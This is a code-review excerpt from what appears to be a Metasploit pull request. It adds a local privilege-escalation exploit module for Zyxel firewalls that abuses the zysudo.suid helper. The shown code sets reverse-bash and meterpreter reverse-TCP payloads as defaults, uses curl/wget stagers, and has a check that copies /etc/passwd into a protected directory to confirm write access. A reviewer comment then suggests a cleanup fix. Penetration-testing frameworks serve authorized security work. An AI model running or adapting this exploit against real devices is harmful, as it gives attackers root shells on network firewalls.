modules/exploits/linux/local/zyxel_suid_cp_lpe.rb

```diff
@@ -0,0 +1,164 @@
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPS64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'MeterpreterTryToFork' => true,
+          'WfsDelay' => 70
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  # The check first establishes the system is a Zyxel firewall by parsing the
+  # /zyinit/fwversion file. Then it attempts to prove that zysudo.suid can be
+  # used by the user to write to otherwise unwrittable location.
+  def check
+    fwversion_data = read_file('/zyinit/fwversion')
+    if fwversion_data.nil? || fwversion_data.empty?
+      return CheckCode::Safe('Could not read /zyinit/fwversion. The target is not a Zyxel firewall.')
+    end
+
+    model_id = fwversion_data[/MODEL_ID=(?<model_id>[^\n]+)/, :model_id]
+    return CheckCode::Unknown('Failed to identify the firewall model.') if model_id.nil? || model_id.empty?
+
+    firmware_ver = fwversion_data[/FIRMWARE_VER=(?<firmware_ver>[^\n]+)/, :firmware_ver]
+    return CheckCode::Unknown('Failed to identify the firmware version.') if firmware_ver.nil? || firmware_ver.empty?
+
+    test_file = "/var/zyxel/#{rand_text_alphanumeric(12..16)}"
+    unless cmd_exec("/bin/cp /etc/passwd #{test_file}") == "/bin/cp: cannot create regular file '#{test_file}': Permission denied"
+      return CheckCode::Unknown("Failed to generate a permission issue. System version: #{model_id}, #{firmware_ver}")
+    end
+
+    suid_copy_result = cmd_exec("zysudo.suid /bin/cp /etc/passwd #{test_file}")
+    unless suid_copy_result.empty?
+      return CheckCode::Safe("zysudo.suid copy failed. System version: #{model_id}, #{firmware_ver}")
+    end
+
+    # clean up the created file
+    cmd_exec("zysudo.suid /bin/rm #{test_file}")
+
+    return CheckCode::Vulnerable("System version: #{model_id}, #{firmware_ver}")
+  end
+
+  # no matter what happens, try to reset the crontab to the original state and
+  # delete the backup file.
+  def cleanup
+    unless @crontab_backup.nil?
+      print_status('Resetting crontab to the original version')
+      cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")
+      rm_rf(@crontab_backup)
+    end
+  end
```

Comment:
I think this needs to `ensure super` so `Msf::Exploit::FileDropper` can do whatever it needs to do (ie, cleanup files registered with `register_file_for_cleanup`). Regardless, it is probably a safe idea anyway. Also guard clause ftw.

```suggestion
  # no matter what happens, try to reset the crontab to the original state and
  # delete the backup file.
  def cleanup
    return if @crontab_backup.nil?

    print_status('Resetting crontab to the original version')
    cmd_exec("zysudo.suid /bin/cp #{@crontab_backup} /var/zyxel/crontab")
    rm_rf(@crontab_backup)
  ensure
    super
  end
```